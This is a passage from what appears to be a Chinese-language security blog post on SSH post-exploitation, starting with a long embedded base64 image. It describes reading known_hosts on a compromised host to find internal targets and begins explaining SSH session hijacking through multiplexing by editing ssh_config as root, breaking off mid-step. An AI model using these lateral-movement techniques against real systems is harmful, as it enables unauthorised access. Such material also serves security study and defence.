aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAABicAAABTCAIAAAB7x0P2AAAgAElEQVR4nO2dXZbrqq6F3S43yGOc3rgJtxV0hsbkPjgY/cyJcZKqVbtqfg9713IwCCGEkHGy/N///d///ve/RQghhBBCCCGEEEKID6KskxBCCCGEEEIIIYT4PMo6CfF7WPf6AJTtXwsmhBBCCCGEEOIPoqyTEEIIIYQQQgghhPg8yjoJIYQQQgghhBBCiM+jrJMQQgghhBBCCCGE+DzKOgkhhBBCCCGEEEKIz/M9Waf2Fcf6UmMhhBBCCCGEEEKIv8E3ZJ3WvR7ppvOP+EFjK/Bnt87LdV9zYXvxuPZKbmuvj0fd7993AenRSxV9ImW3FS7HVuq+7vX7M4MjoX5z20IIIYQQQgghxO/mw1knlLXYa0sMXeU0tvIsufZ7lp6a2sqZGNpKyxWYdMxR8tW8yVa+JOsEevQC790dqsL6OQbnk1mn+RTWP0l2Nd5t+58KL4QQQgghhBBC/Fx81uk4mlP37Xglrm2m1/aGnD1YlC+6gz0Pkwwq21m8XWxl0X593StOAKHEUDoEZHIA/TiUa7H10vb4POpjxDL9KYdGegrpYWqO+nikDFHq0VF4Nlkxc9CpN19qzQPXL+61FHBMbD7r1I+elVKoQogxUOGtxp8DUWu9tLo2fqv9tOzsdgRWyIXNN32ybsLhEEIIIYQQQggh/hT5rNNW2k77eVBnK25Xfx4xyhfZWaeyHWmX9CnMcbBzPfHukMciddp/nn+fR5DM389+Nx3Ufe1d2+uj7mu/bdu2JoI9y9QF8zmm3KNbWScr7XWZfgwMX9wrPiY2mSPqg70+tbIsSCHLK2ed1r2YcclyIqsL2rHDmbrJejTVENEn7CYuKYQQQgghhBBC/ClQ1snnOPy/n1tseHEZZp3KNpN1Ym+iHSkO0IHRWScvv5X5lGQ1mShb0VG4fXoexTlqMMeaHvlKOCAz+W6dyUN5SSZzN+5g1uiiOwtmVLqVuq9XrxkSYbJCbkjeSoav1jLD1aSCVnf8r30/Exrti04BhTDzhkqG3YQlhRBCCCGEEEKIP8U3ZZ3IK3WxNHm3biujr/oeHG5qdx/nlUIxm1ZabmSd7NkumNKa6BHqYsudxC9Iv/mNTrBFcxFlnaZfh4MZFqgQVphVm9qdzTqd34K+H6mrfJztc1kne8kebRt0c9YAhBBCCCGEEEKIX8d11slv2tsOG160e+z+ZtHgrA/MBIWP+gtQViT7ZVLxdTaQIiglJW+2Uvfd9OJIbZ1fYd7esINZJ/NimpHj4m1BK9jsG3YkZ5FuN627IcgXB2ed2pG0IbZHz2HACsHGQLt55NzGZ52I1W2l1Fr3ddnNdyi9lXViNo/0ibpJSgohhBBCCCGEEH8Kl3Xy74mdu3b4/hR+qcp+17Qt+fzWnmpyNPl9NHTiJr66lr8n26Z12IEdlhKyaabHo+6+0vDd1rt5jasVqyb748Q/8xRYpMmsE/tKIpR1ys1wgY5vT/el+4uQY+yIpJacQpAxkF46tR7vYrY/nZzUFOu+GANjt5O2gUJQQ1DJsJu0pBBCCCGEEEII8YfIZ52+AvfTcD+Gn/6L9997TGavZbv9Op8QQgghhBBCCCEE4XuyTj8MfdWzEEIIIYQQQgghxBfzJ7NO4u+RfmVQWUchhBBCCCGEEOJrUdZJCCGEEEIIIYQQQnweZZ2EEEIIIYQQQgghxOdR1kkIIYQQQgghhBBCfB5lnYQQQgghhBBCCCHE51HWSQghhBBCCCGEEEJ8Hph12mv4aa+tkN/7siXTr4TVfd3K4/Gouyl//POo0P2Q2PN2/3cr74AlraDnv5FITBNepC72ef15LxQJljTND9rN6iv7XvZ11M2rGs72kkhI87D1GSU9735eLJv5K0l0KT0mmeK430jRW0nmcSHOUd9RFbavZACmkWx1Ze/a3WwBYhZbyeJxJX8ebgygm9A+gSmelz8peDYwdwHP0w+ARugbgY7lvYvB/dm+daM/HeDxt7Hjmx0wfmkv3lm9rNXo6/I0dHPv61U3a4pvivRm3y/0OTccZL5DEY1ALDyY5Wy21zbu20DO5trIAolupz4ZmvdYnlorkOhK/3E9wuM+vvey4JWcwyqdhOc/SkEDV2u6faLv7ykZ1ckG3d++7jXJGFzleMZ9fDWcqfM1751NMTQUAu/lrH4ufM23u0qCRSDNL93fdlXPxJ9czhzs3Vr2c+ztPwwuea5ivMFJwg8C3Wur+8pQ80Wbv+Or8M3jVcbGtdwaL8J24uv2dYGOZRAeeHGQSEQhTPLMnTgZWXLaI8C5wc07em+2VSc9Gk4uUO5SIW9F9N0wNvMnsdmseWrdk7vyWJgr5V4E2MjmGPUFhyMt0O3CVNbp8PFw/x+yTk+P91Rl3ddl2UqtrVD/+1nG3tZvWWwBU9L1OZc0i1H7GIvEWG1vnrf09W3d6+lBkEioZKu1jBtelmUrLlN0TjnQzSnxqUhQ87j1q1b6XV3OLMRyqfcRk1mnQf32w1OQ8S0hU2UzdsfVq9tdo8YGXf5l1DH08YWSP8YNY2D2SQTcSt3fEZ3emwzsSxX0bU2MgY7lnYvI0petPE6n+kh+fHlFD73KYxU807tslZmh+7qtnFEUmIat2W9QXW53wDutw6XnVt8zeDjIxJ50SEBLODy4gZ36KDqaldOryzhAHwSm4Df7ZGzeF436mMEUGHUIrkds3NM/cQz2mpwnIDwIznl9hs9w4GB0gSBKRh2ZFx7a/PztyFU2ocCMe3c1xCKEOoFCXvTe2XjyveHKrfB1JMxEADkam6vboZw42JsNvYx9mj+NtHH1mKgTbHC48CzQnbK6Lws1X7f5ac9Amh2uMmGEs5KXsYHZhpCvm9xBM6BIA4W8OqlZmRxZ4T0CqS2bN/De4616dD7DyfVaN98zddfHsyIWSGSRUMkbG7Fb4k9GgEC2eP1c7eBuASzQTyHnzjrduuiNbCu1lKPUXs8/O05Z615b8s9t+t0jTVbSChMMPdm9SSJ2F/QUxRQOtt8TaUkkXPKUqtd5jMCZBsS3Wzl9N48RrCnpDlLXXCTXXdI6lhOk5nwEeZl16o8A9pnssq1uINIg4ABNNK12aR7tYJ2d53UPT9VAN12K3op65HZD6tcWsFMy5Ym7D7YZ8dQ6eirVk9DHNdfTMxlva3e3Y1Mk3STTMJmikdqbDyoJ56ZXWuSDWSfmGdLFvZYSnmxjkOZJnfZRxKWkwbG8f/Fik+CyTvtZ2O2202iCHg33AG7grAEDY348HrWU/AjIOts8Dd/VErw4UJ1blay1+Afrr7dO/Px83/E0jMKHct2QyXwHYwS0xMID86TYPJoe1YnPXpiSo6e7fpkw64lfuNPt0CdD84ZTGy9cZoXzjj76ELjssnFfuFdckVO2CzSQkxyIAOHBGTX5JBQcOBJdJM3D7lH7RErmT33pfgA0Rdcjb05gFufVMEUC3F2QJTLWiRWCvTd2qsAUsfBQdTA8mNe81adNVwPNj/NKzpByaITlxDEtCszAcIwfMcagFK22SEt4gwOV7D8KkkQLSSss7jv0yeMwxg/xZOusTu8Z9onZ0YP50SYUzNakZGRg3C/hhPv1DpruJoBI0FWihkj8mWs2HaEnjAbul4bEybxHsxVnYEMckibXhfB5/sWBW9DURmsc2YBfZZ1GYSEpCbREVwQUnNBxvxUBRreSVwTo63gUVL4p67Svey1b/8+ohnWvtdYYPuYMKygZMhReVfEEo00ipn0gnNiL0WgSiZS0puzXzR5co9tHCjEiD5/EUpGSikjrQM5YOExU6Kls500S51y3nKdNNQAHikRijZPg2+d32rwN0Tp4UM0DpjAY8Cyuexx+mkeKHmzR1ZyrhEo+nr+G5ln69Wm4ZjnMt1+lzGNsk+0TV9J6B9fKNUic52bsVxRqkHUaGxityWXwwcW+WYKZzVht1Dzu5radU3Ly0Ybr+nsXrYHFMXbXtnIkZJ9hXNSSj4dij8YGluIDK17fpprwNurJ1o+PxH+n6oYBU1bZC60zPz/fd1oV3EaiwUM3gjECWoLhQVgmzN+ozrqv8UH06Nwxsr0wLOfk8w8dwO3ZJ1PzhlM7LyimSbvatX/6zQzemrIVivrPfh0t0KwhuPSA8GBtUW6ttT/TxgNHooton1TJ8AMgvIkkwxhDmyeLPmgsuko+i8NqCCMB4i5o+JpWWKQQ7L3BlGGmCBsiCkHx/LTmU8dZyXUv/p1NejsLjUAYA8cdB2ZxOKLW4+PH0Ju808ZaYhscGIMtOWE6jMHs3yDUJD4ZmOIgpp1tHZg38Ax4diDVDTehyfkDJUMDA+sm8XW55vHFtJuAIgFXyeoEawcqyXfQrhHmfklIjBPuhOusE5tcA+HZdIQ6tFMbrnFoA36RdUqujmadzpJYSyyAJOVxzHAnAozLVloR4HCwIX5e/56s0ykjC5F5nX5L9+KcAdlWsEl4CkPSybZAEon1yyYajCult3e5uBNxCSz+WtOFqs0/SetY8+O4EHsmdu/tQ9cjYwAFkHXF/XwIv2LWKcQhpz9qewjSNH7gjMLoh8Op0cX9UMlGzuvHNVBh6faxKcIUy2B9yk3Dwg/vMfLW9JHVhAxsINIs0DOgi0DJcTiBWx83ZCsYZ52QY3n3YsiMg8jFL7Ft3xjdTDjgFno0jDl4muN6xwlah9Pwm1UHNoFtNQSL/f3WmZ+f7ztUHRAeNEYuk2JASyg88Hc3s6N1Ph7Hw8eJ98XwJ+mqfVQ/vj375EG8NZraLZ7DfQ9t9ZvAegTGHfpP1KvrBdqHz3npQeFB2/Pte31u/rpQbuCGWylrn3SEx87F70LZTSPrmc6S5PUUugu7hwRDRNwFXDvwCgsUgrw3iZSgKQ6W8us9wrzm76zvJimG3MVE1inXiYM9FJjl4WAbY/QZkIRpaX5fveRA99JCjGBXbs3YN+o7dDbzrbPQKHoGODug6gabUOD8gZKBgZkK3Alf5OtyzeOLX5B1wuFkLAkyf6CbbI9AJtc3ZZ0GwrNl381iOLXRGoc24CzrhAOJLFIuiZXMVgSadcoxw50IMC3B2QnA4RhEQWX7tqxT89wjd4zrfC3rFGwXm/Ky+NBqFFTaz5FIdJ1w7hcIg24fZN8XbPRI/OEC7z7FreNxdPXYoq9mndIqNTzrhESyIOkMOZLumzQfj27HO8zM+28lO/aUdcpspe6r6QVbDbKrg0puDfNDf9dZp3j70BTzoruQiCdcoq+3bCV75F7LIC6cjkrHBkZhm67+xg2NXzNsnF2ddlczuuFoHejzzYthp8onl8my+Tcv4mjCHg27hnYyPsfIY5at5BfEQFPfrLrswZ5RqVHdW63TpWe270/dXZ5sX6jy72ed4sLnwgPnXK+zTnHBuZl1yvZ4qm5Ppx9ogLDayUGTSrRAu3wr6wTXo8EpyctRuc46xcAhLj0oPNhK+zKX3XyhBDxdC6OL1tLF0p/uB4y2po1BFePAzHJ7auMeYXfh+jt0F6Mch/Xed7JO1If806xTzOi9nXXCwR4KzDrncPBuonFOAeF11ulCeDh52cDFFZa4NeaXxn1/oXXYC+ZY4uwYZJ3QJvTCqfb1PRmY+cDcjX1dqvni4mjfMVIIrXM269TazfNr4H5RPpFknZB5Z0kv5KSTCwuPuokCHjK18xp3J+uEA4ksEijJd+VwRZiObW5EgOF2vCIMZ1zgu7NOSG4sW8o69QkfIqoU65bTV/pv+0hJqHRaGAgXWuyBIxYJlIyj1OzmkV3YKL58MeuEhYdNwNahnNhlo4RId9Tu8Lbx4zTd4LpAjcHIaVqHh3uzQs6acdbJP8zpMqNApMtm14neUFweKpq6gTOlfXXW6TxZYY9YWBeGazDNp9vHW50Xs064sGm1RzdwboKGkIFxkeaArWOR3ss6oTqN1sCbYxboWN68mHZ5zS7axW6NNhoz5pxHk/TIf8E/PxnU5dtLilPP249/9NPdBjANv091uEdbKccvYe3nd1a83Tr087N9X+A0xML7SUEeRKfWzzECWoLhgV9jHqhHoE43N0FJKOfVMuEGcyrrBM0bTgTfNNj/+2NzyHuD9Wjw3cfQK7pq4QIN5SRLDwwP/Nv0Kagme8uxfWIfku0TC483CeCfpO/on8hVshkHasCRAHAXwyWSy2+GC3lvMGW4KUJtwCvp4rTmb63vzm7PQALczkKjXCcO9kBgxmIGe1J7NF5OJyafkgXjGxy6ic0fgStphQVuDRvDVbyEuGodmzfZd6DZkVXHNqFoOLCSgYExvwR8He44v5jWHSDSIHf2RtZpWVO2DEVWeI8wm3UaRYATWSc2uZDwuJsw4MF7LrDGwQ24W4PAWhwnBZ+wZ0msZGTzoVnbUa+MWxFgnh3UCYDhgEN8I+vkzwqMdGeORrYl39zUPsVJk3B/30vU/rvzrh+PdHEdF0SnQuFF26dUJxUplKR9P9LhqS0kaO5mq7Wc33D2DN7tENnMSxLzUvM2LIxy+nbO3FoQqUfVSZ9dolIu9+oLClmA6si4p0mYpe8CP1eLpIfeuYXaSGhw9RPGF05yAWPczgOU51WoZKr5bm3tG2G9TMyWwu2on3GNCHVSU/RitcHNSoJzExoDNrDBk9gJrjxDkPJ5Gg4qKgnJtZSn+/F1hbhK7FhcXfcvhl8tH02u9u/Ty5l4K92Pe2R10ldo2PzzI+e/8u1xyrnFp1/dv1V10BTXdox5PR/yvte6W2uS673qe91XrHk2HH1Ax/M9jRHoBQ8PrKNFX+oflp6nfHtNHzyyJTo58zJxljOWZXyxuf164TOaAxMBe4bQ98ej7qxkXo+GS8/EM0K4QM+vHSg8WOz8NbkgW+Q5cPx2cBUpGdgnUZ29bLLhqaEJ7+2/k8tcuYx+24U8ms5TWnfByi2kzqQQ5r3HRttNETdEFIKidKT5K30C9xNqtXabVq64Yz3uNL9mA3cTINgDgRkfjuQpkbfJE9bPL9ZJsx5exmCk/1YMu8Iyt4Z8Muk7tdDr1vHNpENodiTVDVcZEGKRTVM2MLZuBl83KNmJkaoXLYuEFYJmB3GAvHXWtO982iPAkJiZ95W3wbE3WiTTxhbamy9M9x0v7blyqBt2UT6QAJpnJaFGLleEB1u1+URgoTsKF3oxsyKg4chD3ErdOOsEefVMwX+Jp/KOlMSwu3Mlr09GfJB54RNfLCfMzSYGD8ouKv9GJS/L8s3D+u/4I90UP4i/sMq8yRt+/qfzhaP/D5aJ/w5zC7QQYoof7G3uTvXPuoZ/42h+8HAozBb/mC+dHTDrJDpbMflIfEzxVsn8SOYLmRc+8VVy9mTpPXm+UKR3MAndHyTVx/kj3RQ/i9HZQtF5w8//aMwjtH8typ/hjQVaCPGf4v4K+0mfrPXdozBb/AWUdRJCCCGEEEIIIYQQn0dZJyGEEEIIIYQQQgjxeZR1EkIIIYQQQgghhBCfR1knIYQQQgghhBBCCPF5lHUSQgghhBBCCCGEEJ9HWSchhBBCCCGEEEII8XlC1qn/cuPlT2P2X3ks+172tV0oW/+wbPbHMe3vQZrfiGy/0EtKBpFMs5ut56ik/Qv87uRWRr9H6Rt/lut1b/3PO9pd3A+NrvEDJ03SJxMYqI42jPvbZHrefdRnFVi2s1AfwrIdn9Z9dXqP2itbqyeXBGMMNb+6gXwWOTvrx/y25mEhazaw9QAZu97Y6gzX3RY/urw4+hnVqW7O953MQg7qO7pI5Vz3ahpi7b/eTSPMK78FTgRKVtE8Q3ZBYcJyD7bnpuhESO6CCz/1I7zYe/eehkpeH440L8rmLzIVZwnsFbBy4XFnKok92uuUt78YzQ//ADK1uuDSl1tL+Z2GLMO1uEvUKzSVNPXOWyhgvEzwTg0Xvl51msKzPhkMx70e+Yawjqbd2ptaYuRF318/LrFx/zxjd/EOg6jyPlwh3KX7gOfWEm1Gcy/DEQ0TdhzPu7+mWl/pxbdcwKih5we+alzSGy1epO5Eqjecf47nbymE+PnYTdgjI4Ft7srAkk5BX9DubAJnhN6LwjgEzE3ml8ynVLdJS05wH6le13DcPK4z6zKuHdMzjjvAoUtPEsRuzoWagx7NwLaWS1RgqWgF4SY7te/AY4RWWKRkbLQV7Ofe3Yz8EuBZp71ems1W3Kw4149TlVsxRtOq63ete81ahyWBSJtbPs+7ep3E8Mf9csKfMZOLD+7Opq24vdvgdqxP2CJUHQTe3gXpWjL6CkO4tibPkrWetdqraVhhSaNPN9hZ826Q7XjudWq+9oV0vbjDiozU4K0hyem7kjjvgUZLLBnOI1z7rIFhYN/hRQbse7o4kHMrdTfFsYXMj+ZIzjIOuylYIa6TT7GhCwITFo/75ew4a8Xuggg/axXQ6g7N+0o+Z3VOPGDqbMbxmmMZMO7IZLuBbaUnSia3x2QWD/3CqyCrQy79yesSoIYA1IP1XVl3gBUtI+9piS0ToCAwWuLxLxq6MIzBcEBC/8k0xBVNurWBlkLN2NOiMUKLvtnA2oUPjvsXgN3FewZ2GVXeBiuEuvS04OFlArfkdzvjh5RxwhJTRGHhVevmT2hg7znKG+sRbB0YLVmkbkSq01YH4/m7CplZoMmyS2QyO7FQ9GL/wVbDSba4WJf2VCDFIXhuQr/k5acShUjMyxIiVVpDaHRYZ+RiabrSJt7DDmdHkjcF5NOh5nvgraWX69xagvUXRemz+47BGOUVFiiZGO1ow/jqZuQ3cJV1OjJ3xuiPtB2bOuteWxzMd2frQjwCLJlECtXDJWFxXrMlG4+Lx/pbUxYeLbE560QU4pOYsAuraT4mZYk+91pKemqaVAdTrWUjt2MtHnst/9CDZJ3283p0DW30r0v6sR4HN+EoTO6JSz8ft4diJgJupfrDqBBlDVpn2/LYuhcOpnDS7sxrKc8j+MQDGBg1BqOnWkppvYM9Qvsr88TjXBxg38FFHogcf7PsKpjY5z/bROw9s3+n543PyRsfBp7HGIPHu9aSTRwG0cJoIl9Hxh2pCJjiwP2eejdiICcAugm9N5CQjSbUPJ9xqRNXWad4IuCBQih4xdfcQww4Z53z94+ynwcTzJJyKpPMYtdQRWuHmynhSdrRRn8MuGCrs7IPsk5s4YNTOzfUnxLb6Xa5FttUeim1GUD7Ew0Hm9rIaNPsIA5wYLRg4UPWlWYHMQY0HNB7ozGCDS18KffmTYMTvJjm1geels05t+ijJDIcd6AQ00y2+WSfZvYMQzgmfPZLZIyyS6fjjtwvkJMoBLv04SY1rKRnO+N7QbzEdrbIFOHUBqqbeMx2/hOZN1mg0cC9GGab1qPRkkXqRqSKVhlotCzrFBUy70OIryM9QrOaROfPG9J67+thgS4azTy1n821ZMdoG4jDLavW3M9zG7iQiXBWvHh8pEqdFT8TkIKQbJ+++DjrNO8AR0nAFDDEgJz7pTgNSY+YzSe1X2wYjSQgMFtglH573wHGPQeQXMnRaKG7SHXSVfvXcn3WCfndQcp13Wut7sCmK9z+YU00Oer8D5Dk7p7DzEOTXKj7ap9imKD5+Pv0HnE5i8tUlIFmNLawycwzPGWLQuAdsftM4KjdlAOhP7zdVBFVSk4d25a2csToz5jJ1eD97ahkuII0/9RWeNC37qWU6G5OvZ5qjPo8/m2MwZ7zP8W2Ww/YOpQTNGcxg86MNl9cyDx6+BCQGRgzBhOwn84d9H2gkKYFNk3xRToRWmQA9ZceRMTq7Hx6/k2GGN7y7IpfJ+a11OehcRHABV36upzjibMjmiKxN/NUKughOQF2dixbXZYHjybUPJ1xMQo5K8pd4qEZUBwIPfO49zUIHBc3vXtaR/u7BRJuGYmexwmVG7re9iznPfX55ODh9grI6sz1C4VcPEq1Uxs1BLdntO8h1nzGimXr/yFaglObGC101Fmfg7U4L3xQdQuYHdgYTPd98D2T0sUNkaU8mzcxMKil3DrztIMVLmyygCWTcQcKITYP7NNuKc3f2F1k4YlfgmOEXDocd+R+oZxIIUzBMOCB2r6OP8+CKV5qMgO3nE0RhYWzwQkzMBapxgUaDdzrYTaKTl3wnLQxH6kCt0aMlsTzJPKf8CE8LITLbrw9VBFqC9qFqmOxTQ638NQu27KVWms2mDyAOdxqJYM37hK5zUyeCO0Tp6AcqRJnBUcT19m1kpTv7wYzbtoBjmdHnCupm9iHsDA794jImZ3V5YYx2EoKzECUfn/fgcY9BZDACRCjHa9H41XbGtJZBby4/Oe4zjo1hT7McwWgVhch4dAl/eOArAq+5NR2ootzjH6ow2bpQQ7SXTyf6uaYGylk8e7m5axT0CeM8mENvXLTysXtKc0RbBil2J/1tIXWDVfsHSnpKwwiu23RMZDWqZk1Izrrc0lO1T//Ha0rn82JDeXWgZysuXzPeA+cHyrA3Yida9TA8h8kAoV9hxetB7U1wYrDRSbn6MkGj3vAXmh1U7MXQxvji0V3WkutcJhZ0QV5QLoRPExKbiuYInYX9AlncgJ8D7nAsZgIaqHm+YxziRRbUWiXzbh2JYpKJ2Kahihacj4kh8zPeBlcHE1tkP1Ma8dgwsZ6sdVRlfAlyNQApzZqCC8oqO8mhdQCzOPj1vc+NHA4+BzPPc6OOutzsBbnhQ+qDl0kxkA+j7uJcAzHb5tC61DzwLyJgQEtodavPa0nLfo06wTGPSuE2XyyzxR859jHuIskPPNLQCTX/OnS0bgj94vlRAphEeAg4An9uo4/Pd7XoQnboFMHCjAMTpiBsUg1TKnrVSbfw/YXuHWbdQKL1Hykmt0aM1ooKlMIss9QniqELLvx9igrdMtZI5eBLgx1wNLTkrL7Xp/ZWS4nCbeCX2LbwN5Xet45Sp6jUh7GhYams07pcp5x8w5wNDvSaOZuQr808J9BdCZndlZ4w4h3UnjZzVH6/X1HHCMYQLJEQTZa6C7mV+1fy8T3OhmFnqcTh5u3wR4cajSbeC6ZF9Ct1LxWiKUAAAyISURBVH1lMxk+4ZzPOpk9Boi5kUJWdCyE7AOzPEyfbO1BannWBlfQ69u349tM3HweZJ3ammpcMHPcoeSwv/Yf8KGZfaAc7sK7DiP+eA+82GfptHUg55JHlt6DjZZZMrL5h3vwSA0sGQPNp4C+w4uudz4MymXGgaBJiLj1KHS138Ln0e6Ty3yIcUPTWSekkHFQP7FrpR4s2gxfruy/vivrND+5Lmdc7nZogs2457+vsk543EnkfjwupfWjFSHFIv5T0BBaO0xb10HtTavjExEZ3uqfTI72NnlzyPNTPgQ7NrUu64SGI0ztQdYJzP2sT+ZD0MKXusAuUmOA5aP3vtEQ1jwyb2xg9ATKxNTGty1w0UdysnHPCrncyJ0tksAcu4s7WSc2Rr53aNyh6qCcUCEkIqIBT/j3RPwZZAgLLpiw4CNfa5py18HJ/CKFuowH7tUwe9w6XKTmI1Xg1iZ2k2cFXCETPoR2k7Y/nCEd1AOw72glae4G0KfhVtoX7uzp228Gi99gMzLKOqWJcMrgK0+e9jrrNFws7HXibkC4h/IZUe5gn3x25DpAN5Ffms86YTmhs4IbxntZpxSl3953TIw7dgLYaKG7mFy1U8LuT511WpatlCORvBfzLYgwPYFuR5bjTyOj3OS4zmcJ8s2UPdUdYpzprNPZPfigBCjEfGqO2romk4FYHWJ9orUHq+4pgnfSF7dv5ntzjRcYvurv1GW+36c3myOzPFBhcInmUTfN3z04Mrrds0inj3P3gjfsrB5g61DOBazR9thnfG4KjJZYcpqG5vlntipvYMgYnPDBU9sOoYv+kM7drNPFRGA5ZVsgjWYvtxdsHjE+yDWjdXdWS+P9f3dBfMKycaezw0ZmwF3gbf9lSL25V4Mmj3ik0WSav5hx3q0Os04pOrvKFLBxP58shfN92QbN8+gms7sYo4owmqghtJi2snbC3sg6QZeOFIIXPjK1cdapu7WY5a/BRNImdpzRyNF/mNrEaPEyARwgdEF44WvNTU2EZAx4OJD3nm/oOndsUg3AwJiWUEPI0zrP88ibWDOY/X2i+M1braZT9VEh2OahfeKtGnYXWXjilwZjtESXjsYdPqHMFWGF8Ad+OeDJ1eD4M06ZvASbwC5N2NgXJFsKwS6DE2hgk1knMnDzYTZuHRgtWaTuRarRrUGjxeEBVMi0D7nSfPLuU1knlGVeUKj5lDrFNincwkuPfXcy9JOFXGZuIr9EtoFwIpySonYuHwvxYI/WGbaBcO1AG7FZB0hmBxnN2E3ol4j/JD1CnhQ4K7hhhDspGJixbcutfYcfI7rCAicAjRaUvLNq/1pC1gnm9tZ2BHENi1jOt5mLpzpxZq5n7exSDkqOEpPejGyVttBZ4/Gbi61YOb+W7+G+yjJkEM9PnMvOCunlqj2xD27H8id9Pi88n8QaqbLqUIXzt3d9mL+zlrrmHs31mLkddEdKNtHwAHUxzpb6lDYxZBgjn/81XhUO3LNUOWQ4Wze6KTtqvWAL8eLH8xRwKwsjD38xzSM4HL7oyBh8572B+b4XdHHz3Uy2bftOFDKSM5RcwApNbd4F2UseYj8QvbEt+JVsIiMtOYUYNUMXNDlhYd/pREDu18recySPsRMYem82uZhXtJonF/PjmgJeRXnUfeU+GWgvLhNs3I9ane/PMjUPVvc0csdDLShSGE3UEFtM4+3e5da9VYatDhpYXjfhwrdcTu3Up4f9DlHc91TBreEwY+pUlIx2sEygyRWNFi58aUUC8cmFMaTh4N77EOPC+YNZfH4pfNQnMLChltCGM/QS6o6Fa+F2Mu7tu4qsQvZrm4dxGRk2GFudXeJ+KY4Rcul43LP7BXLSiUAiahTwnDJAq3HxJ/Lz2KXDGT8Xh9wLTpKB4UVqDQ6MDhxtqH9EVmguElyk7kSqxK1BW55TCFMy2R9FhcAeEV+HnT/Oc9BPmNqt6vHU3qtVRGlZoSQ7m5u5l2gbyOoks3Cxk5Uv0NjAeJ0DRV2tHTccIJgdw9H0Kh2Hmm4aorrRIGdnRTeMaScFAzMSpeO+w27GXhJHXcM0MlIFowXDwZ0/Dwt/I/Csk/gWaEJdfITnFD+WhOBi4cMc8YNho0kHUkP8r2BPSj88HP/Ef8ppfx8/fgL/TmMYrZu/j1f80u8c92/jMwY2O3DkrZk/Yt6fYng0RrzBv3AmHxxNMA3lHsUQZZ2+G5P115L3hWzPE6pbeaCHK78/ofyrAKN5cRxDQ/zdQM1/fDj+qf/Exw7EhyFT+4fxO40Brpu/jzf80u8c92/jTQObHDi2TPwR8xY/nP/6NjBPw/96j8S3oayTEEIIIYQQQgghhPg8yjoJIYQQQgghhBBCiM+jrJMQQgghhBBCCCGE+DzKOgkhhBBCCCGEEEKIz6OskxBCCCGEEEIIIYT4PN+TdWrfbq/vthdCCCGEEEIIIYT4G3xD1mnd65FuOv+IHzTMDybbDNV52f3QabtqLx7XXslt7fVx/KLqZyE9eqmiT6TstsLl2Erd171+PjM4alQIIYQQQgghhBC/lQ9nnVDWYq8tMXSV09jKs+Ta71l6amorZ2JoKy2PYdIxR8lX8yZb+ZKsE+jRC7x3d6gK6+cYnK/IOg0aFUIIIYQQQgghxK/FZ52Oozl1345X4lqmYG1vyNmDRfmiO9jzMMmgsp3F28VWFiUj1r3iBBBKDKVDQCbB0Y9DuRZbL22Pz6M+RizTn3JopKeQHqbmqI9HyhClHh2FZzMxMwedevOl1jxw/eJeSwHHxKayTseJsFMvRksmsZj1VzZlnYQQQgghhBBCiD9HPuu0lZZEeB7U2YrLKZxHjPJFdtapbEfaJX0KkxHsXE+8O+SxSJ32n+ff5xEk8/ez300HdV971/b6qPvab9u2rYlgzzJ1wXyOKffoVtbJSntdph8Dwxf3io+JoYQhaufxcGfP1iTf8c/VnVHTG3ZCCCGEEEIIIcSfA2WdfI7D//uZ+oEXl2HWqWwzWSf2Jtq6V/y9S6OzTl5+K/MpyWoyUbaiM3VStl5nq8Eca3rkK+EY0eS7dSYP5SWZ/KoldzBrdNGdBTMq3Urd18vXDLmWWm7Jaw7dJYQQQgghhBBCiL/AN2WdyCt1sTR5t24ro6/6Hhxuancf55VCsZAcmc462bNdMKU10SPUxZa5iV+QfvMbnWCL5iLKOpF3I6GctvLzNNzxPeT7XtvLdMo6CSGEEEIIIYQQf53rrJNPNLRkArxosxv9na7BWR+YCQof9TfCrEj2y6Ti62zg/FQpKXmzlbrvphdHauv8CvP2hh3MOpkX04wcF28LWsFm37AjSat0u2ndDUG+ODjr1I6kjXBaMjm3Umvd12U/vz9qde3oDTshhBBCCCGEEOLP4bJO/j2xM7mQXyhjFxdzbMaVLNvi3jULh2vMNyuFEzfx1bXRF5z7ojbNwVJCNs30eNTdV9pPHh2fmpfIWrFqsj9O/PObk7BIk1kndkYIZZ1yM1yg49vTfen+IuRYIqMlNxp1X/zrhPb1vlpHp9WEEEIIIYQQQgjxC8lnnb4C99NwP4af/sNqs2/nfYa9lu36db7LL34SQgghhBBCCCGEWJblu7JOPwz4zdvimvOUk9QmhBBCCCGEEEKIC/5k1kkIIYQQQgghhBBCfDHKOgkhhBBCCCGEEEKIz6OskxBCCCGEEEIIIYT4PMo6CSGEEEIIIYQQQojPo6yTEEIIIYQQQgghhPg8yjoJIYQQQgghhBBCiM9Ds05beZTtOyT4UENbeTy+SWIhhBBCCCGEEEIIcQXLOu217uuH2lj3ytNBH2xo1IwQQgghhBBCCCGE+E5w1smdP9rK4/F41H3b68OcJ1qPfz4eD5M2yhePu09CXmjmoFOvs9SaW+8X91pKSSIJIYQQQgghhBBCiO8HZp22ErM2W2mpnOdnWzkzO+ten6kjeHF01ik3NCqzlTNrBS/u9dEF0bEnIYQQQgghhBBCiH8IyDqhJFFMD/l/P++AF0mFo+upbXBSCl001W2l7tc1CyGEEEIIIYQQQogvImed4Pmjr8g6zRx0cqx7zbkkc1FZJyGEEEIIIYQQQoifQsw6wcwOyBC5tE5L98CLtk7zOhxp6Pi+JpOkMi/LuXryRWWdhBBCCCGEEEIIIX4MIesEvhCpf2+3+5pue3l8cTHvw50X2TcvoaxT/i5ycPF5qe79U321kxBCCCGEEEIIIcS/wmWdyPmjz/NtDQkhhBBCCCGEEEKIfwL8DTshhBBCCCGEEEIIId5CWSchhBBCCCGEEEII8XH+H5AunMpAQPcAAAAAAElFTkSuQmCC" alt="" width="1062" height="56" />
在黑客控制了一台用户机器之后,通过查看known_hosts收集信息,将有可能获取到当前主机连接的下一台跳板机、内网、DMZ机器,以此扩大攻击面
Relevant Link:
https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf
5. SSH Session Hijacking without Re-Authentication
Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication
0x1:SSH multiplexing特征
Multiplexing is the ability to send more than one signal over a single line or connection.
With multiplexing, OpenSSH can re-use an existing TCP connection for multiple concurrent SSH sessions rather than creating a new one each time.
0x2:Setting Up Multiplexing
需要明白的是,SSH劫持是发生在被黑客控制的机器上,黑客通过SSH劫持,希望能够无密码获得当前用户连接的远程ssh会话。
黑客需要修改的配置文件是受控制的用户机器上的配置文件。
1. 修改ssh配置【攻击者有root权限】
vim /etc/ssh/ssh_config
/*
..
